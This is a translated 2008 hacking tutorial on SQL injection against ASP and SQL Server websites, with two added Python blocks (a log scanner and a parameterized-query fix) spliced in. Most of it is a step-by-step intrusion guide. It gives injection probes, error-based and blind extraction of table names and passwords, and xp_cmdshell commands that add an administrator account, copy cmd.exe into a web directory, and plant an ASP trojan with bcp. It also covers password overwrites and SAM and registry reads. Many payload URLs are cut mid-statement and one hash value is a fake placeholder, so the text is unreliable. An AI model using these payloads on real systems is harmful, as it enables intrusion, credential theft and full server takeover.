Hackers teach you what a SQL injection attack is
  Add date: 07/28/2008   Publishing date: 07/28/2008   Hits: 251


  2008-06-30 10:07   Origin: Black and white network

 
(This article is an analysis and summary of a large number of similar articles online, combined with the experience I gained implementing the technique in practice. It contains many direct quotations whose sources were not noted, for which I ask the original authors' forgiveness.)

With the growth of B/S pattern application development, more and more programmers write applications using this pattern. But because programmers' skill and experience vary widely, a considerable proportion of them do not validate the legitimacy of user input when writing code, leaving the application with hidden security dangers. A user can submit a piece of database query code and, from the results the program returns, obtain certain data he wants to know. This is so-called SQL Injection.
SQL injection comes in through the normal WWW port, and on the surface it looks no different from ordinary web page access, so the firewalls currently on the market raise no alarm about SQL injection; if the administrator is not in the habit of checking the IIS logs, an intrusion may go undetected for a very long time. However, SQL injection technique is quite flexible, and many unexpected situations are encountered while injecting. One must analyze according to the specific circumstances and construct ingenious SQL statements in order to obtain the desired data.
Statistics indicate that more than 70% of websites use ASP+Access or SQL Server, PHP+MySQL accounts for 20%, and the rest less than 10%. This article uses SQL-SERVER+ASP as the example to explain the principle, methods and process of SQL injection. (For PHP injection see the related article written by zwell, another friend from the NB alliance.)
The overall approach of a SQL injection attack is:
- discover the SQL injection point;
- determine the type of back-end database;
- determine whether XP_CMDSHELL can be executed;
- discover the WEB virtual directory;
- upload an ASP Trojan;
- obtain administrator privileges.
First, determining whether a SQL injection vulnerability exists
Generally speaking, SQL injection exists in dynamic ASP pages that take parameters, of the form HTTP://xxx.xxx.xxx/abc.asp?id=XX and so on. Sometimes a dynamic page has only one parameter, sometimes N parameters; sometimes they are integer parameters, sometimes string parameters; no general rule can be given. In short, as long as a dynamic page has parameters and accesses the database, SQL injection is possible. If the ASP programmer has no security awareness and does not filter the necessary characters, the likelihood of SQL injection is high.
To fully understand the information a dynamic page returns, first adjust IE's configuration: uncheck IE menu Tools - Internet Options - Advanced - Show friendly HTTP error messages.

To make the explanation clear, the following analysis uses HTTP://xxx.xxx.xxx/abc.asp?p=YY as the example; YY may be an integer or a string.
1st, judging an integer parameter
When the input parameter YY is an integer, the SQL statement in abc.asp is usually roughly as follows:
select * from table where field=YY, so the following steps can test whether SQL injection exists.
①HTTP://xxx.xxx.xxx/abc.asp?p=YY' (append a single quote); the SQL statement in abc.asp becomes
select * from table where field=YY', and abc.asp runs abnormally;
②HTTP://xxx.xxx.xxx/abc.asp?p=YY and 1=1; abc.asp runs normally, and the result is the same as for HTTP://xxx.xxx.xxx/abc.asp?p=YY;
③HTTP://xxx.xxx.xxx/abc.asp?p=YY and 1=2; abc.asp runs abnormally;
If all three of the above conditions are met, abc.asp definitely has a SQL injection vulnerability.
2nd, judging a string parameter
When the input parameter YY is a string, the SQL statement in abc.asp is usually roughly as follows:
select * from table where field='YY', so the following steps can test whether SQL injection exists.
①HTTP://xxx.xxx.xxx/abc.asp?p=YY' (append a single quote); the SQL statement in abc.asp becomes
select * from table where field='YY'', and abc.asp runs abnormally;
②HTTP://xxx.xxx.xxx/abc.asp?p=YY… '1'='1'; abc.asp runs normally, and the result is the same as for HTTP://xxx.xxx.xxx/abc.asp?p=YY;

③HTTP://xxx.xxx.xxx/abc.asp?p=YY… '1'='2'; abc.asp runs abnormally;
If all three of the above conditions are met, abc.asp definitely has a SQL injection vulnerability.
3rd, handling special cases
Sometimes the ASP programmer filters characters such as the single quote in the program to prevent SQL injection. In that case the following methods can be tried.
①Case mixing: because VBScript is not case-sensitive, and programmers when filtering usually filter either only the all-uppercase string or only the all-lowercase string, mixed case is often neglected. For example, replace select or SELECT with SelecT;
②UNICODE method: IIS implements internationalization with the UNICODE character set, so the input string can be converted into a UNICODE string and entered in IE. For example + = %2B, space = %20, and so on; see Appendix 1 for URLEncode information;
③ASCII code method: part or all of the input characters can be replaced with their ASCII codes, such as U=chr(85), a=chr(97), and so on; see Appendix 2 for the ASCII table;
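The probes in this section, together with the user/db_name() and system-table checks and the stacked "; exec master..xp_cmdshell" form in the two sections that follow, leave a characteristic trail in the IIS log that the article says administrators rarely check. The following is an added example, not code from the original article: a small Python scanner over constructed IIS-style log lines that undoes the case-mixing and URL-encoding tricks listed above before matching, so that they do not hide the probes. The W3C field order, the sample lines and the client addresses are assumptions.

```python
import re
from urllib.parse import unquote

# Probe signatures drawn from this article: the three-step tests of
# section 1, the user/db_name() and system-table checks of section 2
# and the stacked "; exec master..xp_cmdshell" form of section 3.
# They are matched AFTER normalize(), so the case-mixing (SelecT),
# URL-encoding (%20) and chr() tricks listed above do not hide them.
PROBE_PATTERNS = {
    "quote_probe":       re.compile(r"^[^']*'$"),              # p=YY'
    "integer_tautology": re.compile(r"\band 1=[12]\b"),        # and 1=1 / and 1=2
    "string_tautology":  re.compile(r"\band '1'='[12]'"),      # and '1'='1'
    "mssql_fingerprint": re.compile(r"\b(user|db_name\(\))>0"),
    "system_table":      re.compile(r"\b(m?sysobjects|sysdatabases|syscolumns)\b"),
    "stacked_exec":      re.compile(r";\s*exec\b"),
    "xp_cmdshell":       re.compile(r"\bxp_cmdshell\b"),
    "chr_obfuscation":   re.compile(r"\bchr\(\d+\)"),          # U=chr(85)
}


def normalize(value: str) -> str:
    """Undo the evasions before matching: URL-decode twice (so %2520 also
    resolves), lower-case, collapse whitespace and drop spaces around
    comparison operators and parentheses."""
    text = unquote(unquote(value.replace("+", " "))).lower().strip()
    text = re.sub(r"\s+", " ", text)
    return re.sub(r"\s*([=<>()])\s*", r"\1", text)


def classify_query(query: str) -> list:
    """Names of every probe pattern found in any parameter value of a raw
    (still URL-encoded) query string. Pairs are split by hand rather than
    with parse_qsl so a ';' inside a stacked query is not taken as a separator."""
    found = set()
    for pair in query.split("&"):
        _name, _sep, value = pair.partition("=")
        norm = normalize(value)
        for label, pattern in PROBE_PATTERNS.items():
            if pattern.search(norm):
                found.add(label)
    return sorted(found)


# Constructed IIS-style log lines (assumed W3C field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status).
# The first and last lines are ordinary traffic; the rest replay the
# article's probes with mixed case and single/double URL encoding.
SAMPLE_LOG = """\
2008-06-30 10:07:01 192.0.2.10 GET /abc.asp p=12 200
2008-06-30 10:07:02 192.0.2.10 GET /abc.asp p=12' 500
2008-06-30 10:07:03 192.0.2.10 GET /abc.asp p=12%20and%201=1 200
2008-06-30 10:07:04 192.0.2.10 GET /abc.asp p=12%20AnD%201=2 500
2008-06-30 10:07:05 192.0.2.10 GET /abc.asp p=12%20and%20user%3E0 500
2008-06-30 10:07:06 192.0.2.10 GET /abc.asp p=12;%20eXeC%20master..xp_cmdshell%20'dir' 200
2008-06-30 10:07:07 192.0.2.10 GET /abc.asp p=12%2520and%25201=1 200
2008-06-30 10:07:08 192.0.2.11 GET /news.asp id=7&page=2 200
"""


def scan_log(text: str) -> list:
    """Return (time, client_ip, uri, probes) for every line that carries
    at least one probe; lines with too few fields are skipped."""
    alerts = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue
        _date, time_, client, _method, stem, query, _status = fields[:7]
        probes = classify_query(query)
        if probes:
            alerts.append((time_, client, stem + "?" + query, probes))
    return alerts


def suspicious_clients(alerts: list, min_probe_types: int = 2) -> dict:
    """Clients that used at least min_probe_types distinct probe types: one
    tautology alone may be a false positive, but a quote probe followed by
    and 1=1 / and 1=2 from the same address is the article's own signature."""
    per_client = {}
    for _time, client, _uri, probes in alerts:
        per_client.setdefault(client, set()).update(probes)
    return {c: sorted(p) for c, p in per_client.items() if len(p) >= min_probe_types}


if __name__ == "__main__":
    for time_, client, uri, probes in scan_log(SAMPLE_LOG):
        print(time_, client, uri, ", ".join(probes))
    print(suspicious_clients(scan_log(SAMPLE_LOG)))
```

Real IIS logs carry more fields than the constructed layout; only the column indices in scan_log need adjusting.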

Second, distinguishing the database server type
Generally speaking, ACCESS and SQL-SERVER are the most commonly used database servers. Although both support the T-SQL standard, there are differences, and different databases call for different attack methods, so they must be treated differently.
1st, distinguishing by the database server's system variables
SQL-SERVER has system variables such as user and db_name(); using these system values not only identifies SQL-SERVER but also yields a lot of useful information. For example:
①HTTP://xxx.xxx.xxx/abc.asp?p=YY and user>0 not only tells whether it is SQL-SERVER, but also reveals the user currently connected to the database;
②HTTP://xxx.xxx.xxx/abc.asp?p=YY… db_name()>0 not only tells whether it is SQL-SERVER, but also reveals the database currently in use;

2nd, using the system tables
The ACCESS system table is msysobjects, which has no access permission under the WEB environment, while the SQL-SERVER system table is sysobjects, which does have access permission under the WEB environment. For the following two statements:
①HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from sysobjects) >
②HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from msysobjects) >
If the database is SQL-SERVER, the first abc.asp runs normally and the second abnormally; if it is ACCESS, both run abnormally.

3rd, three essential MSSQL system tables
sysdatabases system table: each database on Microsoft SQL Server occupies one row in this table. When SQL Server is first installed, sysdatabases contains entries for the master, model, msdb, mssqlweb and tempdb databases. This table is stored only in the master database. What information does this table hold? This is important: it holds all the databases, their IDs and related information.
Here I list the field names useful to us and their explanation. name // the database name.
dbid // the database ID; dbid 1 to 5 are system databases, namely master, model, msdb, mssqlweb and tempdb. All databases can be listed with select * from master.dbo.sysdatabases.
 
sysobjects: every SQL-SERVER database has this system table; it stores all objects created in the database, such as constraints, defaults, logs, rules, stored procedures and so on, each object occupying one row. The field names and explanations of this system table follow.
Name, id, xtype, uid, status: respectively the object name, object ID, object type, user ID of the object owner, and object status.
Object type (xtype). It can be one of the following object types:
C = CHECK constraint
D = default value or DEFAULT constraint
F = FOREIGN KEY constraint
L = log
FN = scalar function
IF = inline table function
P = stored procedure
PK = PRIMARY KEY constraint (type is K)
RF = replication filter stored procedure
S = system table
TF = table function
TR = trigger
U = user table
UQ = UNIQUE constraint (type is K)
V = view
X = extended stored procedure
xtype='U' and status>0 represents a user-created table; name is the table name and id is the table ID value.
Using select * from ChouYFD.dbo.sysobjects where xtype='U' and status>0 lists all user-created tables in database ChouYFD.
 
syscolumns: every column of every table and view occupies one row in this table, and every parameter of a stored procedure also occupies one row. This table exists in each database. The main fields are:

name, id, colid: respectively the field name, the table ID, and the field ID; the id is the table ID we just obtained from sysobjects.
Using select * from ChouYFD.dbo.syscolumns where id=123456789 obtains a list of all fields of the table with ID 123456789 in database ChouYFD.

Third, determining whether XP_CMDSHELL can be executed
If the currently connected account has SA privileges, and the master.dbo.xp_cmdshell extended stored procedure (calling this stored procedure allows direct use of the operating system's shell) executes correctly, then the entire computer can be fully controlled through the following methods, and all of the later steps can be omitted.
1st, HTTP://xxx.xxx.xxx/abc.asp?p=YY…er>0: abc.asp runs abnormally but reveals the current database connection user (if it shows dbo, that stands for SA).
2nd, HTTP://xxx.xxx.xxx/abc.asp?p=YY…me()>0: abc.asp runs abnormally but reveals the current connection database.
3rd, HTTP://xxx.xxx.xxx/abc.asp?p=YY; exec master..xp_cmdshell "net user aaa bbb /add"-- (master is the main SQL-SERVER database; the semicolon means that after SQL-SERVER executes the statement before the semicolon it continues executing the statement that follows; "--" is a comment marker, meaning everything after it is only a comment and is not executed by the system) directly adds the operating system account aaa with password bbb.
4th, HTTP://xxx.xxx.xxx/abc.asp?p=YY; exec master..xp_cmdshell "net localgroup administrators aaa /add"-- adds the just-created account aaa to the administrators group.
5th, HTTP://xxx.xxx.xxx/abc.asp?p=YY; backup database database to disk='c:\inetpub\wwwroot\save.db' backs up the full database content into the WEB directory, to be downloaded over HTTP (naturally the WEB virtual directory must be known first).
6th, creating a UNICODE vulnerability by copying CMD
HTTP://xxx.xxx.xxx/abc.asp?p=YY; exe…dbo.xp_cmdshell "copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\cmd.exe" creates a UNICODE vulnerability; through the usage of this vulnerability, control of the entire computer is achieved (naturally the WEB virtual directory must be known first).
   
 
Fourth, discovering the WEB virtual directory
Only after finding the WEB virtual directory can the location for placing the ASP Trojan be determined and USER privileges obtained. Two methods are quite effective.
First, guessing from experience: generally speaking, the WEB virtual directory is c:\inetpub\wwwroot; D:\inetpub\wwwroot; E:\inetpub\wwwroot and so on, and the executable virtual directory is c:\inetpub\scripts; D:\inetpub\scripts; E:\inetpub\scripts and so on.
Second, traversing the system's directory structure, analyzing the result and discovering the WEB virtual directory.
First create a temporary table: temp
HTTP://xxx.xxx.xxx/abc.asp?p=YY; create…mp (id nvarchar(255), num1 nvarchar(255), num2 nvarchar(255), num3 nvarchar(255)); --
Then:
(1) use xp_availablemedia to obtain all current drives and store them in the temp table:
HTTP://xxx.xxx.xxx/abc.asp?p=YY; insert temp…ter.dbo.xp_availablemedia;
Querying the content of temp yields the list of drives and related information.
(2) use xp_subdirs to obtain the list of subdirectories and store them in the temp table:
HTTP://xxx.xxx.xxx/abc.asp?p=YY; insert into temp (i…dbo.xp_subdirs 'c:\';
(3) xp_dirtree can also obtain the directory tree structure of all subdirectories and store it in the temp table:
HTTP://xxx.xxx.xxx/abc.asp?p=YY; insert into temp(id, num1) exec master.dbo.xp_dirtree 'c:\';
This successfully lists all directories (folders):
 
If we need to view the content of a file, it can be done by executing xp_cmdshell:
HTTP://xxx.xxx.xxx/abc.asp?p=YY; insert into temp(id) exec… 'type c:\web\index.asp'; --
Using the 'bulk insert' syntax, a text file can be inserted into a temporary table. For example: bulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp'

Browsing temp then reads the content of the index.asp file! By analyzing various ASP files, a great deal of system information, WEB build and management information, even the SA account connection password, can be obtained.

Of course, if xp_cmdshell can be executed, we can use it to do:
HTTP://xxx.xxx.xxx/abc.asp?p=YY; insert into temp(id)… cmdshell 'dir c:\
HTTP://xxx.xxx.xxx/abc.asp?p=YY; insert into temp(id)… p_cmdshell 'dir c:\ *.asp /s/a';

Through xp_cmdshell we can see everything we want to see, including W3svc
HTTP://xxx.xxx.xxx/abc.asp?p=YY; insert into temp(id) exec master.dbo.xp_cmdshe…ub\AdminScripts\adsutil.vbs enum w3svc'

However, without SA privileges, we can still use
HTTP://xxx.xxx.xxx/abc.asp?p=YY; insert into temp(id, num1) exec master.dbo.xp_dirtree 'c:\'; --

Attention:
1st, after each browse above is completed, all contents of TEMP should be deleted; the deletion method is:
HTTP://xxx.xxx.xxx/abc.asp?p=YY; delete from temp
2nd, the method for browsing the TEMP table is: (suppose TestDB is the current connection database name)
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top… TestDB.dbo.temp) >0 obtains the id field value of the first record in table TEMP and compares it with an integer; obviously abc.asp runs abnormally, but the error message reveals the value of the id field. Suppose the value found is xyz, then
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 id from…ere id not in ('xyz'))>0 obtains the id field value of the second record in table TEMP.

 
Fifth, uploading the ASP Trojan
The so-called ASP Trojan is a piece of ASP code with special functions; it is placed under the WEB virtual directory Scripts, and a remote client can execute it through IE, thereby obtaining the system's USER privileges and achieving preliminary control of the system. There are generally two fairly effective methods of uploading an ASP Trojan:
1st, using the WEB remote management function
Many WEB sites, for convenience of maintenance, provide a remote management function; many WEB sites also give different users different access rights to their content. To control user privileges, some pages request a user name and password, and only when the correct values are entered can the next step proceed, enabling WEB management such as uploading and downloading files, browsing directories, modifying configuration and so on.
Therefore, if the correct user name and password are obtained, not only can the ASP Trojan be uploaded, sometimes USER privileges to browse the system can even be obtained directly, and the complicated "discover the WEB virtual directory" operation of the previous step can be omitted.
The user name and password are generally stored in a table; finding this table and reading its contents solves the problem. Two effective methods follow.
A, injection method:
Theoretically speaking, the authentication page will have a statement such as:
select * from admin where username='XXX' and password='YYY'; if the necessary character filtering has not been carried out before it is executed, it is very easy to carry out SQL injection.
If you enter abc' or 1=1-- in the user name text box and 123 in the password box, the SQL statement becomes:
select * from admin where username='abc' or 1=1 and password='123'. No matter what user name and password the user enters, this statement always executes correctly, and the user easily deceives the system and gains a legitimate identity.
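The login statement above, as an added example that is not part of the original article: the concatenated form the article describes beside the parameterized form that fixes it, plus the integer-parameter case from section 1 to show why filtering single quotes alone is not enough. SQLite is used as an offline stand-in for SQL Server (an assumption: these statement shapes behave the same way on both), and the admin table, its rows and the column names are constructed.

```python
import sqlite3


# Constructed stand-in for the article's "admin" table. SQLite is used
# instead of SQL Server so the example runs offline (assumption: the
# statement shapes below behave the same way on SQL Server, which they
# do for plain string concatenation and for parameter binding).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("create table admin (id integer, username text, password text)")
    conn.executemany("insert into admin values (?, ?, ?)",
                     [(1, "www", "s3cret"), (2, "editor", "hunter2")])
    return conn


def build_login_statement(username: str, password: str) -> str:
    """Exactly the construction the article describes: user input is pasted
    into the SQL text, so a quote in the input ends the literal early."""
    return ("select * from admin where username='" + username +
            "' and password='" + password + "'")


def login_concatenated(conn, username: str, password: str) -> bool:
    """Vulnerable form. With user name abc' or 1=1-- the statement becomes
    select * from admin where username='abc' or 1=1--' and password='123'
    and the -- comments out the password check, so every row satisfies it."""
    row = conn.execute(build_login_statement(username, password)).fetchone()
    return row is not None


def login_parameterized(conn, username: str, password: str) -> bool:
    """Fixed form: the values travel as bound parameters and are never part
    of the SQL text, so abc' or 1=1-- is just a user name that does not exist."""
    sql = "select * from admin where username=? and password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def count_by_id_quote_filtered(conn, id_value: str) -> int:
    """Integer parameter guarded only by the single-quote filter the article
    says programmers rely on. The value is not inside quotes (section 1,
    integer case), so the filter changes nothing and 'or 1=1' still
    rewrites the WHERE clause."""
    filtered = id_value.replace("'", "''")
    sql = "select count(*) from admin where id=" + filtered
    return conn.execute(sql).fetchone()[0]


def count_by_id_parameterized(conn, id_value: str):
    """Fixed form for the integer case: reject anything that is not an
    integer (returns None) and bind the rest as a parameter."""
    try:
        id_number = int(id_value)
    except ValueError:
        return None
    sql = "select count(*) from admin where id=?"
    return conn.execute(sql, (id_number,)).fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    print(build_login_statement("abc' or 1=1--", "123"))
    print("concatenated  :", login_concatenated(db, "abc' or 1=1--", "123"))
    print("parameterized :", login_parameterized(db, "abc' or 1=1--", "123"))
    print("id filter only:", count_by_id_quote_filtered(db, "1 or 1=1"))
    print("id bound      :", count_by_id_parameterized(db, "1 or 1=1"))
```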
B, guessing method:
The basic idea is: guess all database names, guess each table in the database, analyze which table might store user names and passwords, guess each field name in the table, and guess the content of each record in the table.
- guessing all database names
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) <>0. Because dbid values 1 to 5 are used by the system, user-created databases must start from 6. We submitted name>1 (the name field is a character field, and comparing it with a number causes an error), so abc.asp runs abnormally and the name of the first database is obtained; likewise, changing dbid to 7,8,9,10,11,12… obtains all databases.
In what follows, suppose the database name obtained is TestDB.

- guessing the name of the user table in the database
Guessing method: this method guesses table names from personal experience; generally speaking, user, users, member, members, userlist, memberlist, userinfo, manager, admin, adminuser, systemuser, systemusers, sysuser, sysusers, sysaccounts, systemaccounts and so on, and judges through the statement
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from TestDB.dbo.tablename) >0. If the table exists, abc.asp runs normally, otherwise abnormally. Loop like this until the name of the system account table is guessed correctly.
Reading method: SQL-SERVER has the sysobjects table storing core system information; all tables, views and other information of the database are stored in this table, and this table can be accessed through the WEB.
xtype='U' and status>0 represents a user-created table; by finding and analyzing the name of each user-created table, the name of the user table can be obtained. The basic implementation is:
①HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 name from TestD…type='U' and status>0) >0 obtains the name of the first user-created table and compares it with an integer; obviously abc.asp runs abnormally, but the error message reveals the table name. Suppose the table name found is xyz, then
②HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 name from TestDB.dbo.sysobjects…tatus>0 and name not in ('xyz'))>0 obtains the name of the second user-created table; likewise all user-created table names can be obtained.
From the table names, the table that stores user names and passwords can generally be recognized; in what follows, suppose this table is named Admin.
- guessing the user name field and password field names
The admin table must have a user name field and a password field; only by obtaining these two field names is it possible to obtain their contents. To obtain their names there are likewise the following two methods.
Guessing method: this method guesses field names from personal experience; generally speaking, commonly used names for the user name field are username, name, user, account and so on, and commonly used names for the password field are password, pass, pwd, passwd and so on, judged through the statement
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(fieldname) from TestDB.dbo.admin) >0. The statement "select count(fieldname) from table" obtains the table's row count, so if the field name exists, abc.asp runs normally, otherwise abnormally. Loop like this until both field names are guessed correctly.
Reading method: the basic implementation is
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select…me (object_id ('admin'), 1) from TestDB.dbo.sysobjects) >0. select top 1 col_name (object_id ('admin'), 1) from TestDB.dbo.sysobjects obtains the first field name of the known table from sysobjects; when compared with an integer, obviously abc.asp runs abnormally, but the error message reveals the field name. Changing the 1 in col_name (object_id ('admin'), 1) to 2,3,4,5,6… obtains all field names.
- guessing the user name and password
The most commonly used and most effective methods for guessing the user name and password content include:
The ASCII character-by-character decoding method: although this method is slow, it is definitely feasible. The basic idea is to first guess the length of the field, then guess each value in turn. Guessing the user name and guessing the password use the same method; the following uses guessing the user name as the example to show the process.
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top… from TestDB.dbo.admin) =X (X=1,2,3,4,5,…n; username is the user name field name, admin is the table name). If abc.asp runs normally when X is some value i, then i is the length of the first user name. For example, when
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top…e) from TestDB.dbo.admin) =8 is entered and abc.asp runs normally, the length of the first user name is 8.
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel…ascii(substring(username, m,1)) from TestDB.dbo.admin) =n (m ranges from 1 to the user name length obtained in the previous step; when m=1,2,3,… the 1st, 2nd, 3rd,… character is guessed respectively; n is the ASCII value of 1~9, a~z, A~Z, that is, a value between 1~128; admin is the system user account table name). If abc.asp runs normally when n is some value i, then the character whose ASCII code is i is one character of the user name. For example, when
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel…ascii(substring(username,3,1)) from TestDB.dbo.admin) =80 is entered and abc.asp runs normally, the third character of the user name is P (the ASCII code of P is 80);
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel…ascii(substring(username,9,1)) from TestDB.dbo.admin) =33 is entered and abc.asp runs normally, the ninth character of the user name is ! (the ASCII code of ! is 33);
After the first user name and password are guessed, all other user names and passwords can be guessed in the same way. Attention: sometimes the password obtained may be information encrypted with MD5 or the like, and a special-purpose tool is then needed to decode it; or change the password first, use it, and then change it back; see the following explanation.
Simple method: to guess the user name use
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1…o.admin where username>1); flag is a field in the admin table and username is the user name field; abc.asp runs abnormally but the Username value can be obtained. With a similar method the second user, third user and so on can be obtained, until all users in the table.
Guessing the user password: HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1… B.dbo.admin where pwd>1); flag is a field in the admin table and pwd is the password field; abc.asp runs abnormally but the pwd value can be obtained. With a similar method the second user's password, the third user's password and so on can be obtained, until all users' passwords in the table. Sometimes the password is MD5-encrypted; in that case the password can be changed.
HTTP://xxx.xxx.xxx/abc.asp?p=YY; update TestDB.dbo.admin set pwd='… where username='www'; -- (the MD5 value of 1 is: AAABBBCCCDDDEEEF, that is, change the password to 1; www is the known user name)
Of course the password can be changed back to its original value with a similar method.
 
2nd, exporting the table content to a file
SQL has the BCP command, which can export table content into a text file and place it at a specified location. Using this function, we can first create a temporary table, then enter an ASP Trojan into the table line by line, and then export it with the BCP command to form the ASP file.
The command line form is as follows:
bcp "select * from text..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -S localhost -U sa -P foobar (the 'S' parameter is the server executing the query, the 'U' parameter is the user, the 'P' parameter is the password; at the end a runcommand.asp Trojan has been uploaded)

Sixth, obtaining the system's administrator privileges
The ASP Trojan only has USER privileges; to gain complete control of the system, the system's administrator privileges are needed. How? There are many methods of privilege escalation:
(upload the Trojan, modify the .ini file that runs automatically at startup, and once the machine restarts it is done for);
copy CMD.exe into scripts and artificially create a UNICODE vulnerability;
download the SAM file, crack it and obtain all of the OS's user names and passwords;
and so on; decide according to the system's specific circumstances, and different methods can be adopted.

 
Seventh, several SQL-SERVER special-purpose methods
1st, using the xp_regread extended stored procedure to modify the registry
[xp_regread] Another useful group of built-in stored procedures is the Xp_reg* family (Xp_regaddmultistring, Xp_regdeletekey, Xp_regdeletevalue, Xp_regenumkeys, Xp_regenumvalues, Xp_regread, Xp_regremovemultistring, Xp_regwrite). An attacker can use these functions to modify the registry, for example to read the SAM value, allow null session connections to be established, set programs to run automatically at startup, and so on. For example:
exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares' determines which null-session shares are available on the server.
exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities' shows all the SNMP community strings configured on the server; with this information, an attacker may be able to reconfigure network devices on the same network.

2nd, using other stored procedures to alter the server
The xp_servicecontrol procedure allows the user to start and stop services. For example:
(exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server')
Xp_availablemedia shows the usable drives on the machine
Xp_dirtree allows obtaining a directory tree
Xp_enumdsn enumerates the ODBC data sources on the server
Xp_loginconfig obtains server security information
Xp_makecab allows the user to create a compressed file on the server

Xp_terminate_process terminates the process with the given process ID
 
